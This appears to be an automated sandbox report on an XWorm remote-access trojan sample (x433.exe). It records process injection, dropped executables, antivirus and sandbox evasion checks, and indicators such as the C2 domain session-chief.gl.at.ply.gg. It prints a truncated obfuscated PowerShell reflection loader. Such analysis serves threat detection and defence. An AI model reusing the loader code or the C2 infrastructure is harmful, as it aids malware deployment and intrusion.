Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2A90000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1420000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 13E0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F00000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 25B0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: EE0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: ED0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1220000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2B80000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: DC0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1020000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F40000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 28C0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2D00000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: FA0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2DC0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: EF0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 23F0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2E70000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: FA0000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18DFB160000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1D6EE470000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1D6EE4A0000 Jump to behavior
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5360000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\x433.exe Process created: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe "C:\Users\user\AppData\Local\Temp\x4Shellcode.exe" Jump to behavior
Source: C:\Users\user\Desktop\x433.exe Process created: C:\Users\user\AppData\Local\Temp\x4host.exe "C:\Users\user\AppData\Local\Temp\x4host.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ae1c0bda-3b65-4ccd-a1ee-0c799d56cbd6} Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:rlleiafhazae{param([outputtype([type])][parameter(position=0)][type[]]$osygfxruyuiqnc,[parameter(position=1)][type]$mbvadjewai)$relcklizwns=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+'r'+''+[char](101)+''+'f'+'l'+[char](101)+''+[char](99)+''+'t'+''+[char](101)+''+[char](100)+''+'d'+'e'+[char](108)+''+'e'+''+[char](103)+'a'+[char](116)+''+'e'+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+'n'+[char](77)+'e'+[char](109)+''+[char](111)+''+[char](114)+'y'+'m'+'o'+[char](100)+''+[char](117)+'l'+'e'+'',$false).definetype('my'+'d'+''+'e'+''+[char](108)+''+[char](101)+''+[char](103)+'ate'+[char](84)+''+'y'+'p'+[char](101)+'',''+[char](67)+''+[char](108)+''+[char](97)+''+[char](115)+'s'+','+''+[char](80)+''+'u'+'bl'+'i'+''+[char](99)+''+[char](44)+''+[char](83)+''+[char](101)+'a'+[char](108)+''+[char](101)+''+'d'+','+'a'+''+[char](110)+''+[char](115)+''+[char](105)+''+[char](67)+'la'+[char](115)+''+'s'+','+[char](65)+''+'u'+''+[char](116)+''+'o'+''+[char](67)+''+[char](108)+'a'+[char](115)+'s',[multicastdelegate]);$relcklizwns.defineconstructor(''+[char](82)+''+'t'+'s'+[char](112)+''+[char](101)+''+[char](99)+''+[char](105)+''+[char](97)+'l'+[char](78)+''+'a'+''+[char](109)+'e'+[char](44)+''+[char](72)+''+'i'+'debys'+'i'+''+'g'+''+[char](44)+''+'p'+''+'u'+''+'b'+''+'l'+''+[char](105)+'c',[reflection.callingconventions]::standard,$osygfxruyuiqnc).setimplementationflags(''+'r'+''+[char](117)+''+'n'+''+[char](116)+''+[char](105)+''+[char](109)+''+[char](101)+',m'+[char](97)+''+'n'+''+[char](97)+''+'g'+''+'e'+''+'d'+'');$relcklizwns.definemethod(''+[char](73)+''+[char](110)+'v'+'o'+''+'k'+''+[char](101)+'',''+[char](80)+''+'u'+'b'+[char](108)+''+[char](105)+''+[char](99)+''+','+''+[char](72)+''+[char](105)+'deb'+'y'+''+'s'+'i'+[char](103)+','+'n'+'ew'+[char](83)+''+[char](108)+'o'+[char](116)+''+','+'vi'+[char](114)+'t'+[char](117)+''+[char](97)+''+'l'+'',$mbvadjewai,$osygfxruyuiqnc).setimplementationflags(''+'r'+''+'u'+''+'n'+''+'t'+''+'i'+'me'+[char](44)+''+'m'+''+[char](97)+''+'n'+''+[char](97)+'g'+[char](101)+''+'d'+'');write-output $relcklizwns.createtype();}$ggvrsjgyyzyvf=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals('sy'+[char](115)+''+[char](116)+''+'e'+'m.'+[char](100)+''+[char](108)+''+'l'+'')}).gettype(''+[char](77)+''+[char](105)+''+[char](99)+''+'r'+''+[char](111)+''+[char](115)+''+[char](111)+''+'f'+'t.wi'+[char](110)+'32.'+'u'+''+[char](110)+''+'s'+'a'+[char](102)+''+[char](101)+''+[char](78)+''+[char](97)+''+[char](116)+''+[char](105)+''+'v'+''+[char](101)+''+'m'+'eth'+'o'+''+[char](100)+''+'s'+'');$vrbfksfcqktmpl=$ggvrsjgyyzyvf.getmethod(''+'g'+''+[char](101)+'tpr'+[char](111)+''+[char](99)+''+[char](65)+''+[char](100)+'d'+[char](114)+''+[char](101)+'s'+'s'+''
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 5_2_0000000140002300
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00788550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW, 1_2_00788550
Source: x4host.exe, 00000002.00000002.2967434276.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000031FF000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000032E2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: x4host.exe, 00000002.00000002.2967434276.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000031FF000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000032E2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: winlogon.exe, 00000006.00000000.1742227143.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000006.00000002.2982221757.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000009.00000002.3031673305.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000006.00000000.1742227143.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000006.00000002.2982221757.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000009.00000002.3031673305.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: x4host.exe, 00000002.00000002.2967434276.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000031FF000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000032E2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: x4host.exe, 00000002.00000002.2967434276.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000031FF000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000032E2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager2y
Source: x4host.exe, 00000002.00000002.2967434276.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000031FF000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.00000000032E2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
Source: winlogon.exe, 00000006.00000000.1742227143.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000006.00000002.2982221757.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000009.00000002.3031673305.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: winlogon.exe, 00000006.00000000.1742227143.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000006.00000002.2982221757.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000009.00000002.3031673305.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\dllhost.exe Code function: 5_3_000002D8B0A44040 cpuid 5_3_000002D8B0A44040
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\x433.exe Queries volume information: C:\Users\user\Desktop\x433.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Queries volume information: C:\Users\user\AppData\Local\Temp\x4host.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\x4usb.exe Queries volume information: C:\Users\user\AppData\Local\x4usb.exe VolumeInformation
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 5_2_0000000140002300
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_000002D8B0A67D50 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 5_2_000002D8B0A67D50
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00788550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW, 1_2_00788550
Source: C:\Users\user\Desktop\x433.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: x4host.exe, 00000002.00000002.2937932560.0000000001407000.00000004.00000020.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.3000681433.000000001C0D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: dllhost.exe, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.16.dr Binary or memory string: MsMpEng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\x4host.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information
barindex
Yara detected XWorm
Source: Yara match File source: 0.2.x433.exe.29b77d8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.x4host.exe.fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.x433.exe.29b77d8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.1707631721.0000000000FB2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2967434276.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: x433.exe PID: 6576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x4host.exe PID: 6860, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\x4usb.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\x4host.exe, type: DROPPED

Remote Access Functionality
barindex
Yara detected XWorm
Source: Yara match File source: 0.2.x433.exe.29b77d8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.x4host.exe.fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.x433.exe.29b77d8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.1707631721.0000000000FB2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2967434276.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: x433.exe PID: 6576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x4host.exe PID: 6860, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\x4usb.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\x4host.exe, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465714 Sample: x433.exe Startdate: 02/07/2024 Architecture: WINDOWS Score: 100 49 session-chief.gl.at.ply.gg 2->49 51 ip-api.com 2->51 75 Snort IDS alert for network traffic 2->75 77 Found malware configuration 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 24 other signatures 2->81 8 x433.exe 4 2->8         started        12 powershell.exe 2 15 2->12         started        14 x4usb.exe 2->14         started        signatures3 process4 file5 39 C:\Users\user\AppData\Local\Temp\x4host.exe, PE32 8->39 dropped 41 C:\Users\user\AppData\...\x4Shellcode.exe, PE32 8->41 dropped 43 C:\Users\user\AppData\Local\...\x433.exe.log, CSV 8->43 dropped 83 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->83 16 x4host.exe 16 5 8->16         started        21 x4Shellcode.exe 1 1 8->21         started        85 Writes to foreign memory regions 12->85 87 Modifies the context of a thread in another process (thread injection) 12->87 89 Found suspicious powershell code related to unpacking or dynamic code loading 12->89 91 Injects a PE file into a foreign processes 12->91 23 dllhost.exe 1 12->23         started        25 conhost.exe 12->25         started        93 Antivirus detection for dropped file 14->93 95 Multi AV Scanner detection for dropped file 14->95 97 Machine Learning detection for dropped file 14->97 signatures6 process7 dnsIp8 45 ip-api.com 208.95.112.1, 49730, 80 TUT-ASUS United States 16->45 47 session-chief.gl.at.ply.gg 147.185.221.20, 36125, 49731, 49732 SALSGIVERUS United States 16->47 37 C:\Users\user\AppData\Local\x4usb.exe, PE32 16->37 dropped 57 Antivirus detection for dropped file 16->57 59 Multi AV Scanner detection for dropped file 16->59 61 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 16->61 71 3 other signatures 16->71 63 Machine Learning detection for dropped file 21->63 65 Injects code into the Windows Explorer (explorer.exe) 23->65 67 Contains functionality to inject code into remote processes 23->67 69 Writes to foreign memory regions 23->69 73 3 other signatures 23->73 27 lsass.exe 23->27 injected 30 svchost.exe 23->30 injected 33 winlogon.exe 23->33 injected 35 30 other processes 23->35 file9 signatures10 process11 dnsIp12 99 Installs new ROOT certificates 27->99 101 Writes to foreign memory regions 27->101 53 192.168.2.10 unknown unknown 30->53 55 192.168.2.7 unknown unknown 30->55 signatures13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
208.95.112.1
 ip-api.com United States
53334 TUT-ASUS true
147.185.221.20
 session-chief.gl.at.ply.gg United States
12087 SALSGIVERUS true

Private

IP
192.168.2.10
192.168.2.7

Contacted Domains

Name IP Active
session-chief.gl.at.ply.gg 147.185.221.20 true
ip-api.com 208.95.112.1 true
fp2e7a.wpc.phicdn.net 192.229.221.95 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
session-chief.gl.at.ply.gg true
  • Avira URL Cloud: safe
 unknown
http://ip-api.com/line/?fields=hosting false
  • URL Reputation: safe
 unknown